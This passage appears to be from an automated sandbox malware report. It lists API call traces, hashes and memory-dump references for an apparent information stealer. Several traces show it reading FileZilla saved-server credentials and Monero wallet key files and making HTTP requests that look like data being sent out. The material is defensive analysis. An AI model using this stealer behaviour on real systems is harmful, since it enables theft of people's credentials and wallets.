                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3a526e5755b27e92bf4d2617b784fc58818866a1807c5984ac8a57234bb57bd
                                        • Instruction ID: 54bc2797ff307d560bb43c6991342784ecf7a87137a12ef1002982316a3e8aa0
                                        • Opcode Fuzzy Hash: a3a526e5755b27e92bf4d2617b784fc58818866a1807c5984ac8a57234bb57bd
                                        • Instruction Fuzzy Hash: AF4118F3A086004BF3486D3DDC55366B6D7DBD4320F2AC23DD68697B89ED3998094245
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 0c56739fc303204b4f3b1cb4c78a07827efc2fb675c69a1dffe479c88afe9aca
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: F9513B62E09BD585C7058B7544502EEBFB21FE6214F2E829EC49C2F383C3759689D3E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                        • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00E30DBF,00E30DBE,00E30DBB,00E30DBA), ref: 00E204C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E204C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E204E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E204F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E2052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E2053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00E20579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E205C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E205D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E2067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E206AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E206C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00E206D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 00E206E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E206F3
                                        • lstrcat.KERNEL32(?,00E31770), ref: 00E20702
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E20715
                                        • lstrcat.KERNEL32(?,00E31774), ref: 00E20724
                                        • lstrcat.KERNEL32(?,login: ), ref: 00E20733
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E20746
                                        • lstrcat.KERNEL32(?,00E31780), ref: 00E20755
                                        • lstrcat.KERNEL32(?,password: ), ref: 00E20764
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E20777
                                        • lstrcat.KERNEL32(?,00E31790), ref: 00E20786
                                        • lstrcat.KERNEL32(?,00E31794), ref: 00E20795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E207EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 5d9f7432eb4f82a413d78cb5ac9c1a424c2cae19ea11b9b7a8ba4e8109cd93c4
                                        • Instruction ID: bbd214123e57d09bc78c16b1d12644cfa17f853e9309b453b5c462de89a40fc8
                                        • Opcode Fuzzy Hash: 5d9f7432eb4f82a413d78cb5ac9c1a424c2cae19ea11b9b7a8ba4e8109cd93c4
                                        • Instruction Fuzzy Hash: 6AD16171D00218ABCB18EBF4ED5AEEE77B9AF14700F449569F102B7095EF35AA04CB61
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E15A48
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E15A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E15BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01A8F1E8,00000000,?,01A8E0D0,00000000,?,00E31B4C), ref: 00E15EC1
                                        • lstrlen.KERNEL32(00000000), ref: 00E15ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E15EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E15EEA
                                        • lstrlen.KERNEL32(00000000), ref: 00E15EFF
                                        • lstrlen.KERNEL32(00000000), ref: 00E15F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E15F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00E15F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E15F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E15F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16000
                                        • InternetCloseHandle.WININET(00000000), ref: 00E1600D
                                        • HttpOpenRequestA.WININET(00000000,01A8F2D8,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E15C48
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00E16017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 4bce2182f3c9646edf20c675ca783d186f123c0e7f0a9885c639aa4426b162f0
                                        • Instruction ID: df0fda1dbfb4d4cac8d45771f37a9f1693f8bae0112d1fa5451b89a1384923ec
                                        • Opcode Fuzzy Hash: 4bce2182f3c9646edf20c675ca783d186f123c0e7f0a9885c639aa4426b162f0
                                        • Instruction Fuzzy Hash: 0E120271920128ABCB15EBA0ECA6FEEB3B9BF14700F0855E9F10676091DF706A48CF55
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1D1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E1D1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D308
                                        • lstrcat.KERNEL32(?,00E31570), ref: 00E1D317
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D32A
                                        • lstrcat.KERNEL32(?,00E31574), ref: 00E1D339
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D34C
                                        • lstrcat.KERNEL32(?,00E31578), ref: 00E1D35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D36E
                                        • lstrcat.KERNEL32(?,00E3157C), ref: 00E1D37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D390
                                        • lstrcat.KERNEL32(?,00E31580), ref: 00E1D39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D3B2
                                        • lstrcat.KERNEL32(?,00E31584), ref: 00E1D3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1D3D4
                                        • lstrcat.KERNEL32(?,00E31588), ref: 00E1D3E3
                                          • Part of subcall function 00E2AB30: lstrlen.KERNEL32(UO,?,?,00E14F55,00E30DDF), ref: 00E2AB3B
                                          • Part of subcall function 00E2AB30: lstrcpy.KERNEL32(00E30DDF,00000000), ref: 00E2AB95
                                        • lstrlen.KERNEL32(?), ref: 00E1D42A
                                        • lstrlen.KERNEL32(?), ref: 00E1D439
                                          • Part of subcall function 00E2AD80: StrCmpCA.SHLWAPI(00000000,00E31568,00E1D2A2,00E31568,00000000), ref: 00E2AD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1D4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 65b58ffea2e066ef108e8a6f130e8e9e09efb72b2c303e48da0e44261e2d6908
                                        • Instruction ID: f280726b9bde6b47a9549f153b8bbce772c37dc1eaf5420a250d4ca1b6633824
                                        • Opcode Fuzzy Hash: 65b58ffea2e066ef108e8a6f130e8e9e09efb72b2c303e48da0e44261e2d6908
                                        • Instruction Fuzzy Hash: 62E16171910118ABCB18EBA0ED96EEE77B9AF14701F0455A8F10776091DF36AE48CB62
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01A8D720,00000000,?,00E31544,00000000,?,?), ref: 00E1CB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E1CB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00E1CB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E1CBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E1CBD9
                                        • StrStrA.SHLWAPI(?,01A8D768,00E30B56), ref: 00E1CBF7
                                        • StrStrA.SHLWAPI(00000000,01A8D780), ref: 00E1CC1E
                                        • StrStrA.SHLWAPI(?,01A8DB58,00000000,?,00E31550,00000000,?,00000000,00000000,?,01A889B8,00000000,?,00E3154C,00000000,?), ref: 00E1CDA2
                                        • StrStrA.SHLWAPI(00000000,01A8D958), ref: 00E1CDB9
                                          • Part of subcall function 00E1C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C971
                                          • Part of subcall function 00E1C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C97C
                                        • StrStrA.SHLWAPI(?,01A8D958,00000000,?,00E31554,00000000,?,00000000,01A889E8), ref: 00E1CE5A
                                        • StrStrA.SHLWAPI(00000000,01A88BC8), ref: 00E1CE71
                                          • Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B47), ref: 00E1CA43
                                          • Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B4B), ref: 00E1CA57
                                          • Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B4E), ref: 00E1CA78
                                        • lstrlen.KERNEL32(00000000), ref: 00E1CF44
                                        • CloseHandle.KERNEL32(00000000), ref: 00E1CF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
